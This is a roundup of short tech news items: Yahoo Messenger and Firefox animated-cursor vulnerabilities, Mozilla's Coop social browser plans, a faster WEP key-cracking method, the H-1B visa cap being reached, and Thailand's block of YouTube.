Yahoo this week released an updated version of its instant messaging application to fix a vulnerability in the audio conferencing feature. If exploited, the security hole could give an attacker full control over a Windows computer running the vulnerable software, Yahoo said on its Web site. All versions of Yahoo Messenger downloaded before March 13 are affected, the company said.

Firefox browsers are still vulnerable to attacks exploiting the animated cursor flaw that caused Microsoft to rush out a patch on April 3.

Alexander Sotirov, the security researcher at Determina who first discovered the ANI flaw and reported it to Microsoft in December, has posted a video depicting successful ANI vulnerability exploits on both Internet Explorer 7 and Firefox 2.0 running on Vista in default mode.

In the video, Sotirov notes that turning on Protected Mode works to protect Vista running IE. Although the exploit gives an attacker access to all files on a system, Protected Mode prevents those files from being overwritten.

It turns out that Firefox uses the same vulnerable Windows component to process .ani files, Sotirov says in the video, “Which means it can be exploited in a way similar to Internet Explorer.”

Sotirov demonstrates opening a URL exploit while running Firefox and successfully getting a command shell connection. The shell again gives access to all system files, along with the privileges of the currently logged-on user. But because Firefox has no low-privilege mode similar to IE’s Protected Mode, an attacker can also overwrite system files as well.

Mozilla has released details on The Coop, a new product that will incorporate social networking features directly into the Firefox browser. This is not good news for the privately-backed social browser Flock (also built on Mozilla), which is yet to release a 1.0 version of its browser. Many of the proposed features and some of the mockups created by Mike Beltzner (see above) suggest a significant overlap in the two products.

In fact, Coop even has an example screen shot of Flock on the wiki page describing the product, along with the description “The design will likely resemble [formerly of Flock] Chris Messina’s mockup for “People in the Browser�?, with a horizontal bar containing avatars for a user’s friends, and icons overlaid on those avatars to indicate the presence of new content.�?

The Coop product will allow Firefox users to “subscribe�? to friends in the browser, bringing those friends into a sidebar. Those friends can share content and web pages with you (receive content from you, and send content to you).

Code breakers have discovered a technique for extracting a 104-bit Wired Equivalent Privacy (WEP) key in under a minute.

Cryptographic weaknesses with the first generation wireless encryption standard have been known for years, but the latest attack requires the capture of just a tenth of the number of packets required by previous approaches. The technique allows for 50 per cent probability of the recovery of a 104-bit WEP key in around a minute (on a 802.11g network running at full speed), and with the capture of 40,000 packets. Doubling the capture period extends the probability of capturing the key to 95 per cent.

The latest attack illustrates the need to use the new WPA (Wi-Fi Protected Access) standard, which is far more resistant to attack, though infrequently used, even on wireless networks that employ any form of defences.

The rush by companies, particularly of the high-tech persuasion, to apply for H-1B visas has come to an end–only one day after it began.

U.S. Citizenship and Immigration Services said Tuesday that it had received 150,000 applications as of Monday afternoon for the controversial work permits, which allow foreigners with a bachelor’s degree in their area of specialty to be employed in the United States for up to six years.

That’s more than enough applications to meet the cap for the visas, which currently stands at 65,000. Up to 20,000 additional visas are available for foreigners with advanced degrees from U.S. schools, but USCIS said it hadn’t yet determined how many applications fit in that category.

As for the extra applications, USCIS said it would use a “random selection” process to narrow down what it had already received. All rejected applications and their requisite fees–and those received on or after Wednesday–will be returned to their senders.

Thailand’s military-appointed government blocked access to on-line video-sharing Web site YouTube on Wednesday after its owner, Google Inc., declined to withdraw a video clip mocking the country’s revered monarch.

Communications Minister Sitthichai Pookaiyaudom told Reuters he ordered a block of the entire site, www.youtube.com, from Thailand after the ministry’s attempts to block the offending page last week failed.

“Since Google has rejected our repeated requests to withdraw the clip, we can’t help blocking the entire site in Thailand,” said Sitthichai, a telecoms professor who said he had spent most of his academic life researching eavesdropping devices.

“When they decide to withdraw the clip, we will withdraw the ban,” he said.